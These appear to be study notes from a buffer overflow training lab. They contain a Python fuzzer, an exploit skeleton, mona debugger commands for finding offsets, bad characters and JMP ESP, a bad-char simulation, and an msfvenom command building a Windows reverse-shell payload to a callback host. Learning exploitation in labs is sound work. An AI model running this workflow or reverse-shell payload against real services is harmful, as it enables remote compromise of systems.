Buffer Overflow

Python

Scripts taken from the Buffer Overflow Prep room

Fuzzer

#!/usr/bin/env python3
import socket, time, sys

ip = "[IP]"
port = [PORT]
timeout = 5           # seconds to wait before treating the service as crashed
prefix = "[PREFIX] "  # command the service expects in front of the data

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)  # read the banner
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)  # no reply within the timeout means the service died
  except OSError:
    # connection refused/reset or timed out: the last length crashed it
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"  # grow the payload by 100 bytes per round
  time.sleep(1)

Exploit

#!/usr/bin/env python3
import socket

ip = "[IP]"
port = [PORT]
# bad_chars = "\x00"
# jmp_esp = "\xaf\x11\x50\x62"
prefix = "[PREFIX] "
offset = 0               # distance to EIP, from !mona findmsp
overflow = "A" * offset
retn = "[RETN-ADDRESS]"  # JMP ESP address, little-endian, free of bad chars
padding = ""             # NOP sled placed in front of the shellcode
payload = ""             # msfvenom output (-f c) with bad chars excluded
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except OSError:
  print("Could not connect.")
finally:
  s.close()

Mona (Immunity Debugger)

Set the working folder (%p expands to the debugged process name)

!mona config -set workingfolder c:\mona\%p

Find the EIP offset (run after sending a Metasploit cyclic pattern; -distance is the pattern length)

!mona findmsp -distance 600

Generate a byte array of all values 0x00-0xFF, excluding the null byte (\x00).

!mona bytearray -b "\x00"

Find bad chars by comparing the generated byte array with the bytes in memory at ESP (after sending the byte array as the payload). Repeat, excluding each newly found bad char, until mona reports the memory as unmodified.

!mona compare -f D:\Programs\Immunity Debugger\Mona\bytearray.bin -a <ESP address>
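To show what the bytearray and compare steps above actually do, here is a plain-Python version of that loop (an added example, not part of the original notes and not mona's code). The target is replaced by a constructed mock_memory() function that stands in for "memory at ESP" of a hypothetical program which truncates at \x0a and drops \x3d.

```python
#!/usr/bin/env python3
# Added example: generate -> compare -> exclude loop for bad-char hunting.


def gen_bytearray(exclude=b"\x00"):
    """All byte values 0x00-0xFF except the known bad ones, ascending
    (the same layout as mona's bytearray.bin)."""
    return bytes(b for b in range(256) if b not in exclude)


def compare(sent, observed):
    """Compare the bytes sent with the bytes found in memory.

    Only the FIRST divergence is trustworthy: a bad char usually corrupts or
    truncates everything after it, so one run yields one candidate and the
    check must be repeated with that byte excluded (mona compare has the same
    limitation, which is why its bad-char list needs manual confirmation).
    """
    n = min(len(sent), len(observed))
    for i in range(n):
        if sent[i] != observed[i]:
            return {"status": "corrupted", "offset": i,
                    "candidate": sent[i], "truncated": False}
    if len(observed) < len(sent):
        # Everything present matched but the copy stopped early: the byte
        # that should have followed acted as a terminator (e.g. \x0a).
        return {"status": "corrupted", "offset": n,
                "candidate": sent[n], "truncated": True}
    return {"status": "unmodified", "offset": None,
            "candidate": None, "truncated": False}


def find_bad_chars(probe, known=b"\x00", max_rounds=16):
    """Repeat generate -> send -> compare, one new bad char per round.
    `probe` maps the bytes sent to the bytes later seen at ESP."""
    bad = bytearray(known)
    for _ in range(max_rounds):
        sent = gen_bytearray(bad)
        result = compare(sent, probe(sent))
        if result["status"] == "unmodified":
            return bytes(bad)
        bad.append(result["candidate"])
    raise RuntimeError("too many rounds; check the ESP address/offset")


def mock_memory(payload):
    """Constructed stand-in for the target: cuts input at the first \x0a
    and strips every \x3d ('=') before it lands on the stack."""
    return payload.split(b"\x0a", 1)[0].replace(b"\x3d", b"")


if __name__ == "__main__":
    print("bad chars:", find_bad_chars(mock_memory).hex())  # 000a3d
```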

Find a JMP ESP address whose bytes contain none of the bad chars (-cpb lists the bytes to avoid in the pointer)

!mona jmp -r esp -cpb "\x00\x0a"

List loaded modules and their protections (pick one without ASLR, DEP, SafeSEH or Rebase)

!mona modules

nasm_shell (convert an instruction to its opcode bytes)

Location: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
Assembly: JMP ESP
Hexadecimal: FFE4

Generating shellcode

Msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.195.128 LPORT=4444 EXITFUNC=thread -f c -a x86